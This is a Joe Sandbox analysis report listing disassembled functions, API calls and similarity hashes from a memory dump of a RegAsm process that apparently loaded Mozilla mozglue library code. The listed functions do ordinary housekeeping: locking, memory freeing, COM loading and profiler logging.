Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 79b8b062562bf04611786445434eb490f890f3fc53dfa4655cc89bd21f6ec5a6
Instruction ID: 0228fcf6260cfcdf69e9d22637379e0c9bed9765839fd31a06705f2256a7545b
Opcode Fuzzy Hash: 79b8b062562bf04611786445434eb490f890f3fc53dfa4655cc89bd21f6ec5a6
Instruction Fuzzy Hash: 165168357006048FCB25DF59C584A7ABBF5FF89318B69855DE9AA8B351C731E842CF80

Function 6C124AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124B48
free.MOZGLUE(?,?,?,80000000,?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124BEE

Strings

pid:, xrefs: 6C124BE8

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: daf7bd840a1e7acfc18f342b99de02cbf9da9bcd1d1c6dd53f4d2a8948dcd437
Instruction ID: 6f3942ffa229b4b8c9369fdd78e00c5c4e8d31159f0a80da8cbfa9d24bfd8b2f
Opcode Fuzzy Hash: daf7bd840a1e7acfc18f342b99de02cbf9da9bcd1d1c6dd53f4d2a8948dcd437
Instruction Fuzzy Hash: 27411775B002198BCB14CFBCDC846AFBBF9EF85224B144638E865DB781D7349958C7A1

Function 6C131D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C131D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C131BE3,?,?,6C131D96,00000000), ref: 6C131D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C131BE3,?,?,6C131D96,00000000), ref: 6C131D4C
GetCurrentThreadId.KERNEL32 ref: 6C131DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C131DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C131DDA

Part of subcall function 6C131EF0: GetCurrentThreadId.KERNEL32 ref: 6C131F03
Part of subcall function 6C131EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C131DF2,00000000,00000000), ref: 6C131F0C
Part of subcall function 6C131EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C131F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C131DF4

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 20cfeb86093705445359db318b2f5c2e24adb2626d009e6ddc9512f3b1dcdfdb
Instruction ID: 5420aed7b68454dd73c186b89badd7b5d1c75a4697b175183c902493393a07e6
Opcode Fuzzy Hash: 20cfeb86093705445359db318b2f5c2e24adb2626d009e6ddc9512f3b1dcdfdb
Instruction Fuzzy Hash: 5E4157B56007109FCB10DF29C489B66BBF9FB89358F20442EE99A87B41CB71F854CB91

Function 6C14AAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C16E220,?), ref: 6C14BC2D
ReleaseSRWLockExclusive.KERNEL32(6C16E220), ref: 6C14BC42
RtlFreeHeap.NTDLL ref: 6C14BC82
RtlFreeUnicodeString.NTDLL(6C16E210), ref: 6C14BC91
RtlFreeUnicodeString.NTDLL(6C16E208), ref: 6C14BCA3
RtlFreeHeap.NTDLL ref: 6C14BCD2
free.MOZGLUE(?), ref: 6C14BCD8

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 2b1f4d76a361f7862698b7be5cf3fd04052ad290f774c10e9f33760f9c64073d
Instruction ID: 728a2ceb8847add9a75d694eb01cd470bdc4276f8f52afe1f5e10d97c941052f
Opcode Fuzzy Hash: 2b1f4d76a361f7862698b7be5cf3fd04052ad290f774c10e9f33760f9c64073d
Instruction Fuzzy Hash: 0521BFB2600B04CFE7209F0ACCC0BAAB7E9BF45718F55C469E9595BA10CB75E846CBD0

Function 6C0F38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C16E220,?,?,?,?,6C0F3899,?), ref: 6C0F38B2
ReleaseSRWLockExclusive.KERNEL32(6C16E220,?,?,?,6C0F3899,?), ref: 6C0F38C3
free.MOZGLUE(00000000,?,00000000,0000002C,?,?,?,6C0F3899,?), ref: 6C0F38F1
RtlFreeHeap.NTDLL ref: 6C0F3920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C0F3899,?), ref: 6C0F392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C0F3899,?), ref: 6C0F3943
RtlFreeHeap.NTDLL ref: 6C0F396E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 1543747391ba74227167966910c08eb1a580084b2b417fb2c26a528c274ee13e
Instruction ID: 49e5da32721fe1c1987897b2364f2cf1dfff28b70f497b2945f7bcb9163e4601
Opcode Fuzzy Hash: 1543747391ba74227167966910c08eb1a580084b2b417fb2c26a528c274ee13e
Instruction Fuzzy Hash: 5921F372600714DFD710DF29C880B96B7E9EF49328F158429ED6A97B10CB34E886CB91

Function 6C1284E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1284F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1285AC

Part of subcall function 6C127670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C1285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12767F
Part of subcall function 6C127670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C1285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C127693
Part of subcall function 6C127670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C1285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1276A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1285B2

Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: d765ba71faa40bad2ef2f49e306e8fdfedda5b7c395702df543258d482be6232
Instruction ID: 4453f382ed12fe4c588c53796c81481a6e905c912789b3a4038e85fb651acc01
Opcode Fuzzy Hash: d765ba71faa40bad2ef2f49e306e8fdfedda5b7c395702df543258d482be6232
Instruction Fuzzy Hash: C62191792007418FEB14DB69C888A6AB7B5BF5430CF14492DE99BC3B41DB39F988CB51

Function 6C0F1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0F1699
VerSetConditionMask.NTDLL ref: 6C0F16CB
VerSetConditionMask.NTDLL ref: 6C0F16D7
VerSetConditionMask.NTDLL ref: 6C0F16DE
VerSetConditionMask.NTDLL ref: 6C0F16E5
VerSetConditionMask.NTDLL ref: 6C0F16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0F16F9

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 0285b872ddf4eee12848439fddb4aeb8666dd0f0dc8c593b72a3636169ace72e
Instruction ID: 8af0cd5aaed627e2100105ea63eb7fb002ee7953bacf52c72068ca37647ae6ec
Opcode Fuzzy Hash: 0285b872ddf4eee12848439fddb4aeb8666dd0f0dc8c593b72a3636169ace72e
Instruction Fuzzy Hash: 4721D2F07402086BEB106A658C85FBFB3BCEF9A708F404528F6459B6C0C6749E55CBA1

Function 6C13D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C13D1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D1F5

Part of subcall function 6C13AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C13AE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D211
GetCurrentThreadId.KERNEL32 ref: 6C13D217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D279
free.MOZGLUE(?), ref: 6C13D2B2

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: ed386dee3c67544784fd805b439f0ab064acda39e5ecaad58d6b5b6cb29a160a
Instruction ID: 516a2c85718e1863d63309a87c5d24a4455fda256414d2505b65b653d126b654
Opcode Fuzzy Hash: ed386dee3c67544784fd805b439f0ab064acda39e5ecaad58d6b5b6cb29a160a
Instruction Fuzzy Hash: E1217E71704305DBCB05DF25C488AAEB7B5FF8A328F10462DE55A8B340DB34A909DB96

Function 6C12F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C12F598), ref: 6C12F621

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

GetCurrentThreadId.KERNEL32 ref: 6C12F637
AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000,?,6C12F598), ref: 6C12F645
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000,?,6C12F598), ref: 6C12F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C12F62A

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: fb61f4c32999105ed4817dd088d0d74e0bbd0492db7f8555552150dfd7d12cdd
Instruction ID: fd30b94b3a0b6d9a27129836e5af33125c4f3759a49eb7235027b8ad91bffced
Opcode Fuzzy Hash: fb61f4c32999105ed4817dd088d0d74e0bbd0492db7f8555552150dfd7d12cdd
Instruction Fuzzy Hash: 2F11E03A305214ABCB04AF1AC948EF57779FB8636CF100065FA1583F41CB39A826DBA0

Function 6C0F2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

LoadLibraryW.KERNEL32(combase.dll,6C0F1C5F), ref: 6C0F20AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0F20CD
__Init_thread_footer.LIBCMT ref: 6C0F20E1
FreeLibrary.KERNEL32 ref: 6C0F2124

Strings

CoInitializeSecurity, xrefs: 6C0F20C7
combase.dll, xrefs: 6C0F20A9

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: f6290894ebed6982eac6eda90f5da77520226151997771a8a9e09893c72fb235
Instruction ID: fb1bb02887c019f915913637b60b689e72935b48b7731358891d9dc5584ff58e
Opcode Fuzzy Hash: f6290894ebed6982eac6eda90f5da77520226151997771a8a9e09893c72fb235
Instruction Fuzzy Hash: 4A213D76205249EFDF11CF56DC48FAA3BB6FB4A369F104015FE2492610D73198A2EF61

Function 6C1299A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C1299C1
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1299CE
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1299F8
GetCurrentThreadId.KERNEL32 ref: 6C129A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C129A0D

Part of subcall function 6C129A60: GetCurrentThreadId.KERNEL32 ref: 6C129A95
Part of subcall function 6C129A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C129A9D
Part of subcall function 6C129A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C129ACC
Part of subcall function 6C129A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C129BA7
Part of subcall function 6C129A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C129BB8
Part of subcall function 6C129A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C129BC9

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C129A15

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 36c8fddb9227bd22c7b9e0d9707a7230c1dd266e3b6ffd6a42347a7c50b29b57
Instruction ID: e01488524b4624be04276ef10505274b540ffbdeac7246b64ababdb552fcab51
Opcode Fuzzy Hash: 36c8fddb9227bd22c7b9e0d9707a7230c1dd266e3b6ffd6a42347a7c50b29b57
Instruction Fuzzy Hash: A201D63AA082259BDF006F2F94287B93B78EB4326CF054056FD5553F41D73C4855E6B1

Function 6C0F1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C0F1FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C0F1FFD
__Init_thread_footer.LIBCMT ref: 6C0F2011
FreeLibrary.KERNEL32 ref: 6C0F2059

Strings

CoCreateInstance, xrefs: 6C0F1FF7
combase.dll, xrefs: 6C0F1FD9

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: 8525d8d187b30cad086ce671f5b45cad9a303715b76eed88dfbc96d4b7a5b9fe
Instruction ID: 22c9eadbb89c05e940d455af01c700752d16ee68dccccf2855a6da84602246f1
Opcode Fuzzy Hash: 8525d8d187b30cad086ce671f5b45cad9a303715b76eed88dfbc96d4b7a5b9fe
Instruction Fuzzy Hash: EF116A76306244EFDF10CF56C84CFAA3BB9EB46359F004029FD2482A41C7319C55EAA1

Function 6C0F0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C11D9F0,00000000), ref: 6C0F0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C0F0F3C
__Init_thread_footer.LIBCMT ref: 6C0F0F50
FreeLibrary.KERNEL32(?,6C11D9F0,00000000), ref: 6C0F0F86

Strings

CoInitializeEx, xrefs: 6C0F0F36
combase.dll, xrefs: 6C0F0F18

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 695456114211e6e0da030c3e1e18c888db6f098fc0776134a8c0b7df81f18759
Instruction ID: 25b041b1ab4f2f4748f670851232a9196524df3fca9b8d18452f03703abbf261
Opcode Fuzzy Hash: 695456114211e6e0da030c3e1e18c888db6f098fc0776134a8c0b7df81f18759
Instruction Fuzzy Hash: AA11867C709250DBEF00CF56C918B6637F4FB4A329F40822AFD2592F40D734984AEA56

Function 6C0F62E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6C0F631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6C0F633A
__Init_thread_footer.LIBCMT ref: 6C0F634E
FreeLibrary.KERNEL32 ref: 6C0F6376

Strings

CoUninitialize, xrefs: 6C0F6334
combase.dll, xrefs: 6C0F6316

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
